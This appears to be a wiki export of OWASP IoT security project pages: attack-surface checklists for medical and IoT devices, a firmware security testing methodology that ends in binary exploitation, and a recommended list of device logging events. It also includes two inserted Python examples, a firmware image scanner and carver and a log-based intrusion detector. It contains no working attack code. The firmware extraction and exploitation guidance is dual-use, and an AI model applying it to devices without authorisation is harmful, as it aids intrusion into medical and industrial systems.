| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! Contents<br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
== Firmware Security Testing Methodology ==<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and information security professionals to conduct firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relevant technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Obtain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}<br />
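The following is an added example, not code from the OWASP page or from any of the tools listed above: a signature scan and block-entropy map (stage 3, analyzing firmware) followed by SquashFS carving (stage 4, extracting the filesystem) over a firmware image constructed inline. The magic values are the real ones for the named formats; the sample image and the 7.5-bit entropy threshold are assumptions.<br />

```python
"""Signature scan, block-entropy map and SquashFS carving over a constructed
firmware image. Added example; not code from the OWASP page or from any tool
listed there. Magic values are real; the sample image is an assumption."""
import math
import random
import struct

# Real magic values of formats commonly met in embedded firmware.
SIGNATURES = {
    b"\x27\x05\x19\x56": "uImage header (U-Boot legacy image)",
    b"\x1f\x8b\x08": "gzip compressed data",
    b"hsqs": "SquashFS filesystem, little-endian",
    b"sqsh": "SquashFS filesystem, big-endian",
    b"UBI#": "UBI erase block header",
}
HIGH_ENTROPY = 7.5  # bits/byte; above this a block is likely compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~0 for padding, close to 8 for random data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_signatures(image: bytes):
    """Stage 3: list (offset, description) for every known magic in the image."""
    hits = []
    for magic, desc in SIGNATURES.items():
        off = image.find(magic)
        while off != -1:
            hits.append((off, desc))
            off = image.find(magic, off + 1)
    return sorted(hits)


def entropy_map(image: bytes, block: int = 1024):
    """Stage 3: (offset, entropy, is_high) per block, to spot encrypted or
    compressed regions that a signature scan alone would miss."""
    result = []
    for off in range(0, len(image), block):
        ent = shannon_entropy(image[off:off + block])
        result.append((off, round(ent, 2), ent > HIGH_ENTROPY))
    return result


def squashfs_bounds(image: bytes, off: int):
    """Stage 4: return (start, end) of a little-endian SquashFS image whose
    superblock starts at off. bytes_used sits at superblock offset 40, after
    magic, inodes, mkfs_time, block_size, fragments, compression, block_log,
    flags, no_ids, s_major, s_minor and root_inode."""
    if image[off:off + 4] != b"hsqs":
        raise ValueError("no little-endian SquashFS superblock at offset %d" % off)
    bytes_used = struct.unpack_from("<Q", image, off + 40)[0]
    return off, off + bytes_used


def carve(image: bytes, start: int, end: int, out_path: str) -> int:
    """Stage 4: write the carved region to disk; returns the byte count."""
    with open(out_path, "wb") as fh:
        fh.write(image[start:end])
    return end - start


def build_sample_image() -> bytes:
    """Constructed sample image (assumption, not a real device): a zeroed
    uImage header, 0xFF padding, a minimal SquashFS superblock and 4 KiB of
    deterministic pseudo-random bytes standing in for compressed data."""
    rng = random.Random(1234)
    header = b"\x27\x05\x19\x56" + bytes(60)        # 64-byte uImage header
    padding = b"\xff" * 2048                         # unused flash
    payload = bytes(rng.getrandbits(8) for _ in range(4096))
    sb = bytearray(96)                               # SquashFS superblock
    sb[0:4] = b"hsqs"
    struct.pack_into("<I", sb, 4, 12)                # inodes
    struct.pack_into("<I", sb, 12, 131072)           # block_size
    struct.pack_into("<H", sb, 20, 1)                # compression: gzip
    struct.pack_into("<H", sb, 28, 4)                # s_major
    struct.pack_into("<Q", sb, 40, len(sb) + len(payload))  # bytes_used
    return header + padding + bytes(sb) + payload + b"\xff" * 512


if __name__ == "__main__":
    img = build_sample_image()
    for off, desc in scan_signatures(img):
        print("0x%06x  %s" % (off, desc))
    for off, ent, high in entropy_map(img):
        print("0x%06x  entropy=%.2f%s" % (off, ent, "  <- high" if high else ""))
    start, end = squashfs_bounds(img, 2112)
    print("SquashFS spans 0x%x-0x%x (%d bytes)" % (start, end, end - start))
```

A high-entropy region with no signature hit is the cue that the image is encrypted or uses a vendor container, and that stage 3 needs more work before stage 4 can carve anything.<br />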
The full{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
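As an added example (not code from the OWASP page or the project), the detector below maps constructed device log lines onto several categories from the table above: Request Exceptions (unsupported HTTP method), Authentication Exceptions (multiple failed passwords, high rate of login attempts), Session Exceptions (source change during a session) and Administrative Mode Events (default administrative credentials). The key=value log format, the field names and the thresholds are assumptions.<br />

```python
"""Event detector for a constructed IoT device log. Added example, not from
the OWASP page; the log format, field names and thresholds are assumptions."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

SUPPORTED_METHODS = {"GET", "POST", "PUT", "DELETE"}
FAIL_THRESHOLD = 3                   # consecutive failed passwords per user
RATE_LIMIT = 10                      # login attempts per source ...
RATE_WINDOW = timedelta(seconds=60)  # ... within this sliding window
ADMIN_USERS = {"admin", "root"}

# Constructed sample log: one line per request, "timestamp key=value ...".
SAMPLE_LOG = [
    "2019-10-04T18:00:00Z src=10.0.0.5 method=GET path=/status session=s1 result=ok",
    "2019-10-04T18:00:01Z src=10.0.0.5 method=TRACE path=/status session=s1 result=denied",
    "2019-10-04T18:00:02Z src=10.0.0.9 method=POST path=/login user=admin result=fail",
    "2019-10-04T18:00:03Z src=10.0.0.9 method=POST path=/login user=admin result=fail",
    "2019-10-04T18:00:04Z src=10.0.0.9 method=POST path=/login user=admin result=fail",
    "2019-10-04T18:00:05Z src=10.0.0.9 method=POST path=/login user=admin result=ok"
    " default_cred=yes session=s2",
    "2019-10-04T18:00:06Z src=203.0.113.7 method=GET path=/config session=s2 result=ok",
] + [
    "2019-10-04T18:00:%02dZ src=198.51.100.4 method=POST path=/login user=guest result=fail"
    % (10 + i) for i in range(10)
]


def parse_line(line: str) -> dict:
    """Split 'ISO-timestamp key=value key=value ...' into a dict."""
    ts_str, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
    return fields


class IoTEventDetector:
    """Stateful detector; feed() returns the (event name, detail) pairs a line raises."""

    def __init__(self):
        self.failures = defaultdict(int)     # user -> consecutive failed logins
        self.attempts = defaultdict(deque)   # src  -> timestamps of login attempts
        self.session_src = {}                # session id -> source that opened it

    def feed(self, line: str):
        f = parse_line(line)
        events = []
        # Request Exceptions: method the device does not implement.
        method = f.get("method")
        if method not in SUPPORTED_METHODS:
            events.append(("Attempt to Invoke Unsupported HTTP Method",
                           "%s from %s" % (method, f["src"])))
        # Session Exceptions: same session id presented from a new source.
        sid = f.get("session")
        if sid:
            first_src = self.session_src.setdefault(sid, f["src"])
            if first_src != f["src"]:
                events.append(("Source Location Changes During Session",
                               "%s: %s -> %s" % (sid, first_src, f["src"])))
        if f.get("path") == "/login":
            # Authentication Exceptions: rate of attempts per source.
            q = self.attempts[f["src"]]
            q.append(f["ts"])
            while f["ts"] - q[0] > RATE_WINDOW:
                q.popleft()
            if len(q) == RATE_LIMIT:
                events.append(("High Rate of Login Attempts",
                               "%d attempts from %s within %ds"
                               % (RATE_LIMIT, f["src"], RATE_WINDOW.seconds)))
            # Authentication Exceptions: consecutive failures per user.
            user = f.get("user", "?")
            if f.get("result") == "fail":
                self.failures[user] += 1
                if self.failures[user] == FAIL_THRESHOLD:
                    events.append(("Multiple Failed Passwords", "user %s" % user))
            else:
                self.failures[user] = 0
                # Administrative Mode Events: the device reports that the
                # admin account still carries its factory credentials.
                if user in ADMIN_USERS and f.get("default_cred") == "yes":
                    events.append(("Device Accessed Using Default Administrative Credentials",
                                   "user %s from %s" % (user, f["src"])))
        return events

    def run(self, lines):
        found = []
        for line in lines:
            found.extend(self.feed(line))
        return found


if __name__ == "__main__":
    for name, detail in IoTEventDetector().run(SAMPLE_LOG):
        print("%-60s %s" % (name, detail))
```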
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255232OWASP Internet of Things Project2019-10-04T18:01:51Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
